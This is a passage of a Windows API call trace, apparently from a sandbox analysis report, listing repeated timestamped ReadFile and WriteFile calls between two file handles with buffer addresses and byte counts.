hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.849] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.850] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x169, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.850] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.851] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.851] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x61, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.852] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.852] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3c0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.853] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.853] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3db, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.854] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.854] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.855] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.855] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.856] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.856] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.857] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.857] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.858] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x97, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.858] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.859] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.859] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x36, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.860] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.860] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.861] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x61, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.861] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.862] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3bf, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.862] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.863] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x345, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.863] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.864] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.864] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x81, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.865] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.865] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3e0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.866] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.866] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x31f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.867] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.867] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x361, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.868] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.868] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x362, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.869] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.869] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x37c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.870] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.870] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.871] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x147, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.871] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.871] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x301, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.872] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.872] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x372, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.873] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.873] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.874] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.874] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.875] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x372, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.875] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.876] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.876] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.877] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.877] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3f1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.878] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.879] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3cf, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.879] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.880] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3f9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.880] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.880] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x339, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.881] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.881] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.882] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.882] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.883] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.883] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x48, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.884] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.884] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.885] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x60, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.885] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.886] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.886] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.887] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.887] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3b6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.888] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.888] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.889] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.889] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.890] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3db, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.890] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.892] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3f4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.892] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.893] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.893] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1de, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.894] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.894] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.895] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xd4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.895] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.896] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.896] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x8c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.896] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.897] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.898] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x278, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.898] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.898] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: 